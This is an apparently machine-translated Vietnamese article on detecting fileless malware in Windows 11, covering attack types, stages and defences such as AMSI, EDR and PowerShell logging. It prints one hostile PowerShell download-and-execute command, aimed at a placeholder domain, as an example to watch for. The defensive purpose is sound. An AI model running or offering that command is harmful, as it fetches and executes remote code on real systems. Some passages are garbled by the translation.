Cách phát hiện phần mềm độc hại không có tệp nguy hiểm trong Windows 11

¿Làm thế nào để phát hiện phần mềm độc hại không có tệp nguy hiểm? Hoạt động tấn công không có tệp đã tăng đáng kể và tệ hơn nữa, Windows 11 không miễn nhiễmPhương pháp này bỏ qua đĩa và dựa vào bộ nhớ cùng các công cụ hệ thống hợp lệ; đó là lý do tại sao các chương trình diệt virus dựa trên chữ ký gặp khó khăn. Nếu bạn đang tìm kiếm một cách đáng tin cậy để phát hiện virus, câu trả lời nằm ở việc kết hợp đo từ xa, phân tích hành vi và điều khiển Windows.

Trong hệ sinh thái hiện tại, các chiến dịch lạm dụng PowerShell, WMI hoặc Mshta cùng tồn tại với các kỹ thuật tinh vi hơn như tiêm bộ nhớ, duy trì "mà không cần chạm" vào đĩa và thậm chí lạm dụng phần mềmĐiều quan trọng là phải hiểu bản đồ mối đe dọa, các giai đoạn tấn công và những tín hiệu mà chúng để lại ngay cả khi mọi thứ xảy ra trong RAM.

Phần mềm độc hại không có tệp là gì và tại sao nó lại đáng lo ngại trong Windows 11?

Khi chúng ta nói về các mối đe dọa "không có tệp", chúng ta đang đề cập đến mã độc hại Bạn không cần phải gửi các tệp thực thi mới trong hệ thống tập tin để hoạt động. Nó thường được đưa vào các tiến trình đang chạy và được thực thi trong RAM, dựa trên các trình thông dịch và tệp nhị phân được Microsoft ký (ví dụ: PowerShell, WMI, rundll32, mshtaĐiều này giúp giảm thiểu dấu vết và cho phép bạn bỏ qua các công cụ tìm kiếm chỉ tìm kiếm các tệp đáng ngờ.

Ngay cả các tài liệu văn phòng hoặc PDF khai thác lỗ hổng để khởi chạy lệnh cũng được coi là một phần của hiện tượng này, bởi vì kích hoạt thực thi trong bộ nhớ mà không để lại các tệp nhị phân hữu ích để phân tích. Lạm dụng macro và DDE Trong Office, vì mã chạy trong các tiến trình hợp pháp như WinWord.

Kẻ tấn công kết hợp kỹ thuật xã hội (lừa đảo, liên kết thư rác) với các bẫy kỹ thuật: cú nhấp chuột của người dùng sẽ khởi tạo một chuỗi trong đó một tập lệnh tải xuống và thực thi phần tải trọng cuối cùng trong bộ nhớ, tránh để lại dấu vết trên đĩa. Các mục tiêu bao gồm từ đánh cắp dữ liệu đến thực thi mã độc tống tiền, cho đến di chuyển ngang âm thầm.

Phân loại theo dấu chân trong hệ thống: từ 'thuần chủng' đến lai

Để tránh nhầm lẫn các khái niệm, việc phân loại các mối đe dọa theo mức độ tương tác của chúng với hệ thống tệp sẽ rất hữu ích. Phân loại này làm rõ điều gì tồn tại, mã tồn tại ở đâu và nó để lại những dấu hiệu gì?.

Loại I: không có hoạt động tập tin

Phần mềm độc hại hoàn toàn không có tệp, không ghi bất cứ thứ gì vào đĩa. Một ví dụ điển hình là khai thác lỗ hổng mạng (giống như vector EternalBlue ngày xưa) để triển khai một backdoor nằm trong bộ nhớ kernel (như trường hợp DoublePulsar). Ở đây, mọi thứ diễn ra trong RAM và không có hiện tượng lạ nào trong hệ thống tệp.

Một lựa chọn khác là làm ô nhiễm phần mềm của các thành phần: BIOS/UEFI, bộ điều hợp mạng, thiết bị ngoại vi USB (các kỹ thuật kiểu BadUSB) hoặc thậm chí cả hệ thống con CPU. Chúng vẫn tồn tại ngay cả khi khởi động lại và cài đặt lại, với độ khó tăng thêm. Một số sản phẩm kiểm tra phần mềmĐây là những cuộc tấn công phức tạp, ít xảy ra hơn nhưng nguy hiểm vì tính lén lút và lâu dài của chúng.

Loại II: Hoạt động lưu trữ gián tiếp

Ở đây, phần mềm độc hại không "rời khỏi" chương trình thực thi của riêng nó, mà sử dụng các vùng chứa do hệ thống quản lý, về cơ bản được lưu trữ dưới dạng tệp. Ví dụ: các cửa hậu cài đặt Các lệnh PowerShell trong kho lưu trữ WMI và kích hoạt việc thực thi bằng bộ lọc sự kiện. Có thể cài đặt từ dòng lệnh mà không làm mất các tệp nhị phân, nhưng kho lưu trữ WMI nằm trên đĩa như một cơ sở dữ liệu hợp pháp, khiến việc dọn dẹp mà không ảnh hưởng đến hệ thống trở nên khó khăn.

Về mặt thực tế, chúng được coi là không có tệp, vì vùng chứa đó (WMI, Registry, v.v.) Nó không phải là một tệp thực thi có thể phát hiện cổ điển Và việc dọn dẹp nó không hề đơn giản. Kết quả: sự tồn tại âm thầm với rất ít dấu vết "truyền thống".

Loại III: Yêu cầu tệp để hoạt động

Một số trường hợp duy trì một sự kiên trì 'không có tệp' Ở cấp độ logic, chúng cần một trình kích hoạt dựa trên tệp. Ví dụ điển hình là Kovter: nó đăng ký một động từ shell cho một phần mở rộng ngẫu nhiên; khi một tệp có phần mở rộng đó được mở, một tập lệnh nhỏ sử dụng mshta.exe sẽ được khởi chạy, tái tạo chuỗi độc hại từ Registry.

Bí quyết là các tệp "mồi" có phần mở rộng ngẫu nhiên này không chứa tải trọng có thể phân tích được và phần lớn mã nằm trong Ghi (một vùng chứa khác). Đó là lý do tại sao chúng được phân loại là không có tệp khi tác động, mặc dù xét một cách nghiêm ngặt, chúng phụ thuộc vào một hoặc nhiều hiện vật đĩa như một tác nhân kích hoạt.

Các tác nhân truyền nhiễm và 'vật chủ': nơi nó xâm nhập và nơi nó ẩn náu

Để cải thiện khả năng phát hiện, điều quan trọng là phải lập bản đồ điểm xâm nhập và vật chủ của bệnh nhiễm trùng. Quan điểm này giúp thiết kế kiểm soát cụ thể Ưu tiên dữ liệu đo từ xa phù hợp.

Khai thác

• Dựa trên tập tin (Loại III): Tài liệu, tệp thực thi, tệp Flash/Java cũ hoặc tệp LNK có thể khai thác trình duyệt hoặc công cụ xử lý chúng để tải shellcode vào bộ nhớ. Vectơ đầu tiên là một tệp, nhưng dữ liệu sẽ được truyền đến RAM.
• Dựa trên mạng (Loại I): ​​Một gói khai thác lỗ hổng (ví dụ: trong SMB) sẽ thực thi trong vùng người dùng hoặc kernel. WannaCry đã phổ biến cách tiếp cận này. Tải bộ nhớ trực tiếp không có tập tin mới.

Phần cứng

• Thiết bị (Loại I): ​​Phần mềm ổ đĩa hoặc card mạng có thể bị thay đổi và mã hóa. Khó kiểm tra và tồn tại bên ngoài hệ điều hành.
• CPU và hệ thống quản lý (Loại I): ​​Các công nghệ như ME/AMT của Intel đã chứng minh các con đường dẫn đến Mạng và thực thi bên ngoài hệ điều hànhNó tấn công ở cấp độ rất thấp, có khả năng tàng hình cao.
• USB (Loại I): ​​BadUSB cho phép bạn lập trình lại ổ USB để giả dạng bàn phím hoặc NIC và khởi chạy lệnh hoặc chuyển hướng lưu lượng.
• BIOS/UEFI (Loại I): ​​lập trình lại chương trình cơ sở độc hại (trường hợp như Mebromi) chạy trước khi Windows khởi động.
• Người giám sát (Loại I): ​​Triển khai một trình siêu giám sát mini bên dưới hệ điều hành để che giấu sự hiện diện của nó. Hiếm gặp, nhưng đã được phát hiện dưới dạng rootkit siêu giám sát.

Thực hiện và tiêm

• Dựa trên tập tin (Loại III): EXE/DLL/LNK hoặc các tác vụ theo lịch trình khởi chạy các lệnh tiêm vào các tiến trình hợp pháp.
• Macro (Loại III): VBA trong Office có thể giải mã và thực thi các phần mềm độc hại, bao gồm cả phần mềm tống tiền hoàn chỉnh, với sự đồng ý của người dùng thông qua lừa dối.
• Kịch bản (Loại II): PowerShell, VBScript hoặc JScript từ tệp, dòng lệnh, dịch vụ, Đăng ký hoặc WMIKẻ tấn công có thể nhập tập lệnh trong phiên làm việc từ xa mà không cần chạm vào đĩa.
• Bản ghi khởi động (MBR/Boot) (Loại II): Các họ mã độc như Petya ghi đè lên boot sector để chiếm quyền điều khiển khi khởi động. Nó nằm ngoài hệ thống tệp, nhưng có thể được hệ điều hành và các giải pháp hiện đại có thể khôi phục.

Cách thức hoạt động của các cuộc tấn công không có tệp: các giai đoạn và tín hiệu

Mặc dù chúng không để lại các tệp thực thi, nhưng các chiến dịch tuân theo logic theo từng giai đoạn. Việc hiểu chúng cho phép theo dõi. các sự kiện và mối quan hệ giữa các quá trình để lại dấu ấn.

• Truy cập ban đầuTấn công lừa đảo bằng cách sử dụng liên kết hoặc tệp đính kèm, trang web bị xâm nhập hoặc thông tin đăng nhập bị đánh cắp. Nhiều chuỗi bắt đầu bằng một tài liệu Office kích hoạt lệnh PowerShell.
• Sự bền bỉ: cửa hậu thông qua WMI (bộ lọc và đăng ký), Khóa thực thi sổ đăng ký hoặc các tác vụ theo lịch trình khởi chạy lại các tập lệnh mà không có tệp độc hại mới.
• Sự thẩm thấuSau khi thu thập được thông tin, thông tin đó sẽ được gửi ra khỏi mạng bằng các quy trình đáng tin cậy (trình duyệt, PowerShell, bitsadmin) để trộn lưu lượng.

Mẫu này đặc biệt nguy hiểm vì chỉ số tấn công Chúng ẩn trong trạng thái bình thường: đối số dòng lệnh, chuỗi quy trình, kết nối đi bất thường hoặc truy cập vào API tiêm.

Kỹ thuật phổ biến: từ trí nhớ đến ghi chép

Các diễn viên dựa vào một loạt các phương pháp giúp tối ưu hóa khả năng tàng hình. Biết những cách phổ biến nhất để kích hoạt khả năng phát hiện hiệu quả sẽ rất hữu ích.

• Cư dân trong ký ức: Tải trọng vào không gian của một tiến trình đáng tin cậy đang chờ kích hoạt. rootkit và hook Trong hạt nhân, chúng nâng cao mức độ che giấu.
• Sự tồn tại trong sổ đăng kýLưu các blob đã mã hóa vào khóa và khôi phục chúng từ trình khởi chạy hợp lệ (mshta, rundll32, wscript). Trình cài đặt tạm thời có thể tự hủy để giảm thiểu dung lượng.
• Lừa đảo thông tin xác thựcSử dụng tên người dùng và mật khẩu bị đánh cắp, kẻ tấn công thực hiện các shell và máy chủ từ xa truy cập im lặng trong Registry hoặc WMI.
• Phần mềm tống tiền 'không có tệp'Mã hóa và giao tiếp C2 được điều phối từ RAM, giảm khả năng bị phát hiện cho đến khi thiệt hại được nhìn thấy.
• Bộ dụng cụ phẫu thuật: chuỗi tự động phát hiện lỗ hổng bảo mật và triển khai các tải trọng chỉ dành cho bộ nhớ sau khi người dùng nhấp chuột.
• Tài liệu có mã: các macro và cơ chế như DDE kích hoạt các lệnh mà không lưu tệp thực thi vào đĩa.

Các nghiên cứu trong ngành đã chỉ ra những đỉnh điểm đáng chú ý: trong một giai đoạn của năm 2018, một tăng hơn 90% trong các cuộc tấn công chuỗi dựa trên tập lệnh và PowerShell, một dấu hiệu cho thấy vectơ được ưu tiên vì tính hiệu quả của nó.

Thách thức đối với các công ty và nhà cung cấp: tại sao việc chặn là không đủ

Sẽ rất hấp dẫn khi vô hiệu hóa PowerShell hoặc cấm macro mãi mãi, nhưng Bạn sẽ phá vỡ hoạt độngPowerShell là trụ cột của quản trị hiện đại và Office rất cần thiết trong kinh doanh; việc chặn một cách mù quáng thường không khả thi.

Hơn nữa, có nhiều cách để bỏ qua các điều khiển cơ bản: chạy PowerShell thông qua DLL và rundll32, đóng gói các tập lệnh vào EXE, Mang theo bản sao PowerShell của riêng bạn hoặc thậm chí ẩn các tập lệnh trong hình ảnh và trích xuất chúng vào bộ nhớ. Do đó, việc bào chữa không thể chỉ dựa trên việc phủ nhận sự tồn tại của các công cụ.

Một sai lầm phổ biến khác là giao toàn bộ quyết định cho đám mây: nếu tác nhân phải đợi phản hồi từ máy chủ, Bạn mất khả năng phòng ngừa theo thời gian thựcDữ liệu đo từ xa có thể được tải lên để làm giàu thông tin, nhưng Việc giảm thiểu phải diễn ra tại điểm cuối.

Cách phát hiện phần mềm độc hại không có tệp trong Windows 11: dữ liệu từ xa và hành vi

Chiến lược chiến thắng là giám sát các tiến trình và bộ nhớKhông phải tệp. Các hành vi độc hại ổn định hơn các dạng tệp, khiến chúng trở nên lý tưởng cho các công cụ phòng ngừa.

• AMSI (Giao diện quét phần mềm chống phần mềm độc hại)Nó chặn các tập lệnh PowerShell, VBScript hoặc JScript ngay cả khi chúng được xây dựng động trong bộ nhớ. Tuyệt vời để bắt các chuỗi bị mã hóa trước khi thực thi.
• Giám sát quy trình: bắt đầu/kết thúc, PID, cha mẹ và con cái, tuyến đường, dòng lệnh và băm, cùng với cây thực thi để hiểu toàn bộ câu chuyện.
• Phân tích bộ nhớ: phát hiện các lần tiêm, tải phản xạ hoặc PE mà không cần chạm vào đĩa và xem xét các vùng thực thi bất thường.
• Bảo vệ khu vực khởi động: kiểm soát và khôi phục MBR/EFI trong trường hợp bị can thiệp.

Trong hệ sinh thái Microsoft, Defender for Endpoint kết hợp AMSI, giám sát hành viQuét bộ nhớ và học máy dựa trên đám mây được sử dụng để mở rộng khả năng phát hiện các biến thể mới hoặc bị che giấu. Các nhà cung cấp khác sử dụng các phương pháp tương tự với các công cụ nằm trong nhân.

Ví dụ thực tế về tương quan: từ tài liệu đến PowerShell

Hãy tưởng tượng một chuỗi trong đó Outlook tải xuống tệp đính kèm, Word mở tài liệu, nội dung hoạt động được bật và PowerShell được khởi chạy với các tham số đáng ngờ. Dữ liệu từ xa phù hợp sẽ hiển thị dòng lệnh (ví dụ: Bỏ qua ExecutionPolicy, cửa sổ ẩn), kết nối với miền không đáng tin cậy và tạo một tiến trình con tự cài đặt trong AppData.

Một tác nhân có bối cảnh địa phương có khả năng dừng lại và đảo ngược hoạt động độc hại mà không cần can thiệp thủ công, ngoài việc thông báo cho SIEM hoặc qua email/SMS. Một số sản phẩm bổ sung lớp quy kết nguyên nhân gốc rễ (mô hình kiểu StoryLine), lớp này không chỉ ra quy trình hiển thị (Outlook/Word), mà chỉ ra chủ đề độc hại đầy đủ và nguồn gốc của nó là làm sạch toàn diện hệ thống.

Một mẫu lệnh điển hình cần chú ý có thể trông như thế này: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic không phải là chuỗi chính xác, nhưng tập hợp các tín hiệu: bỏ qua chính sách, ẩn cửa sổ, xóa tải xuống và thực thi trong bộ nhớ.

AMSI, đường ống và vai trò của từng tác nhân: từ điểm cuối đến SOC

Ngoài việc ghi lại tập lệnh, một kiến ​​trúc mạnh mẽ sẽ sắp xếp các bước giúp điều tra và phản hồi dễ dàng hơn. Càng có nhiều bằng chứng trước khi thực hiện tải thì càng tốt., tốt hơn.

• Chặn tập lệnhAMSI cung cấp nội dung (ngay cả khi nội dung được tạo ra ngay lập tức) để phân tích tĩnh và động trong quy trình xử lý phần mềm độc hại.
• Sự kiện quy trìnhPID, nhị phân, hàm băm, tuyến đường và dữ liệu khác được thu thập. lập luận, thiết lập các cây quy trình dẫn đến tải trọng cuối cùng.
• Phát hiện và báo cáoCác phát hiện được hiển thị trên bảng điều khiển sản phẩm và chuyển tiếp đến các nền tảng mạng (NDR) để trực quan hóa chiến dịch.
• Đảm bảo của người dùngNgay cả khi một tập lệnh được đưa vào bộ nhớ, khuôn khổ AMSI chặn nó trong các phiên bản Windows tương thích.
• Khả năng của quản trị viên: cấu hình chính sách để cho phép kiểm tra tập lệnh, chặn dựa trên hành vi và tạo báo cáo từ bảng điều khiển.
• Công việc SOC: trích xuất các hiện vật (VM UUID, phiên bản hệ điều hành, loại tập lệnh, tiến trình khởi tạo và tiến trình cha của nó, hàm băm và dòng lệnh) để tạo lại lịch sử và quy tắc nâng tương lai.

Khi nền tảng cho phép xuất khẩu bộ đệm bộ nhớ Liên quan đến quá trình thực hiện, các nhà nghiên cứu có thể tạo ra những phát hiện mới và tăng cường khả năng phòng thủ chống lại các biến thể tương tự.

Các biện pháp thực tế trong Windows 11: phòng ngừa và săn tìm

Ngoài việc có EDR với kiểm tra bộ nhớ và AMSI, Windows 11 cho phép bạn đóng các không gian tấn công và cải thiện khả năng hiển thị với điều khiển gốc.

• Đăng ký và hạn chế trong PowerShellCho phép ghi nhật ký khối tập lệnh và ghi nhật ký mô-đun, áp dụng các chế độ hạn chế khi có thể và kiểm soát việc sử dụng Bỏ qua/Ẩn.
• Quy tắc giảm bề mặt tấn công (ASR): chặn các tập lệnh khởi chạy bởi các quy trình Office và Lạm dụng WMI/PSExec khi không cần thiết.
• Chính sách macro của Office: vô hiệu hóa theo mặc định, chữ ký macro nội bộ và danh sách tin cậy nghiêm ngặt; giám sát luồng DDE cũ.
• Kiểm toán và đăng ký WMI: giám sát các đăng ký sự kiện và các khóa thực thi tự động (Run, RunOnce, Winlogon), cũng như việc tạo tác vụ lên kế hoạch.
• Bảo vệ khởi động: kích hoạt Khởi động an toàn, kiểm tra tính toàn vẹn của MBR/EFI và xác thực rằng không có sửa đổi nào khi khởi động.
• Vá và làm cứng: đóng các lỗ hổng có thể khai thác trong trình duyệt, thành phần Office và dịch vụ mạng.
• Nhận thức: đào tạo người dùng và nhóm kỹ thuật về lừa đảo và tín hiệu các vụ hành quyết bí mật.

Để săn tìm, hãy tập trung vào các truy vấn về: tạo quy trình bằng Office hướng tới PowerShell/MSHTA, các đối số với chuỗi tải xuống/tệp tải xuốngCác tập lệnh có khả năng che giấu rõ ràng, chèn mã phản chiếu và kết nối mạng ra các TLD đáng ngờ. Hãy đối chiếu chéo các tín hiệu này với uy tín và tần suất để giảm nhiễu.

Ngày nay, mỗi loại động cơ có thể phát hiện được những gì?

Các giải pháp doanh nghiệp của Microsoft kết hợp AMSI, phân tích hành vi, kiểm tra trí nhớ và bảo vệ khu vực khởi động, cùng với các mô hình ML dựa trên đám mây để mở rộng quy mô chống lại các mối đe dọa mới nổi. Các nhà cung cấp khác triển khai giám sát cấp độ kernel để phân biệt phần mềm độc hại với phần mềm lành tính bằng cách tự động khôi phục các thay đổi.

Một cách tiếp cận dựa trên những câu chuyện hành quyết Nó cho phép bạn xác định nguyên nhân gốc rễ (ví dụ: tệp đính kèm Outlook kích hoạt chuỗi) và giảm thiểu toàn bộ cây: tập lệnh, khóa, tác vụ và tệp nhị phân trung gian, tránh bị mắc kẹt ở triệu chứng có thể nhìn thấy.

Những lỗi thường gặp và cách tránh chúng

Việc chặn PowerShell mà không có kế hoạch quản lý thay thế không chỉ không thực tế mà còn cách để gọi nó một cách gián tiếpĐiều tương tự cũng áp dụng cho macro: hoặc bạn phải quản lý chúng bằng chính sách và chữ ký, nếu không doanh nghiệp sẽ bị ảnh hưởng. Tốt hơn hết là nên tập trung vào dữ liệu từ xa và các quy tắc hành vi.

Một sai lầm phổ biến khác là tin rằng việc đưa các ứng dụng vào danh sách trắng sẽ giải quyết được mọi vấn đề: công nghệ không cần tệp tin hoàn toàn dựa vào điều này. ứng dụng đáng tin cậyCơ quan kiểm soát phải quan sát những gì chúng làm và mối quan hệ của chúng, chứ không chỉ quan tâm xem chúng có được phép hay không.

Với tất cả những điều trên, phần mềm độc hại không có tệp sẽ không còn là "bóng ma" nữa khi bạn theo dõi những gì thực sự quan trọng: hành vi, trí nhớ và nguồn gốc của mỗi lần thực thi. Kết hợp AMSI, dữ liệu đo từ xa quy trình phong phú, các điều khiển gốc của Windows 11 và lớp EDR với phân tích hành vi mang lại cho bạn lợi thế. Thêm vào đó là các chính sách thực tế cho macro và PowerShell, kiểm tra WMI/Registry, và việc tìm kiếm ưu tiên các dòng lệnh và cây quy trình, và bạn sẽ có một hệ thống phòng thủ ngăn chặn những chuỗi này trước khi chúng kịp phát ra tiếng động.